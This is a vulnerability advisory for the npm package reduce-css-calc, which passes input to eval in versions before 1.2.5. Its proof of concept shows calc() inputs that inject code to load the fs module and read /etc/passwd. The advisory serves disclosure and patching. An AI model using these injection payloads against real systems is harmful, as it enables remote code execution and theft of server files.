GHSA-4662-j96g-mv46

Source
https://github.com/advisories/GHSA-4662-j96g-mv46
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/06/GHSA-4662-j96g-mv46/GHSA-4662-j96g-mv46.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-4662-j96g-mv46
Aliases
Published
2018-06-07T19:43:06Z
Modified
2023-11-08T03:58:11.888099Z
Summary
Arbitrary Code Injection in reduce-css-calc
Details

Affected versions of reduce-css-calc pass input directly to eval. If user input is passed into the calc function, this may result in cross-site scripting on the browser, or remote code execution on the server.

Proof of Concept

const reduceCSSCalc = require('reduce-css-calc');
console.log(reduceCSSCalc(`calc(                       (Buffer(10000)))`));
console.log(reduceCSSCalc(`calc(                       (global['fs'] = require('fs')))`));
console.log(reduceCSSCalc(`calc(                       (fs['readFileSync']("/etc/passwd", "utf-8")))`));

Recommendation

Update to version 1.2.5 or later.

Database specific
{
    "nvd_published_at": null,
    "cwe_ids": [
        "CWE-94"
    ],
    "severity": "CRITICAL",
    "github_reviewed": true,
    "github_reviewed_at": "2020-06-16T20:57:38Z"
}
References

Affected packages

npm / reduce-css-calc

Package

Affected ranges

Type
SEMVER
Events
Introduced
0 (unknown introduced version; all previous versions are affected)
Fixed
1.2.5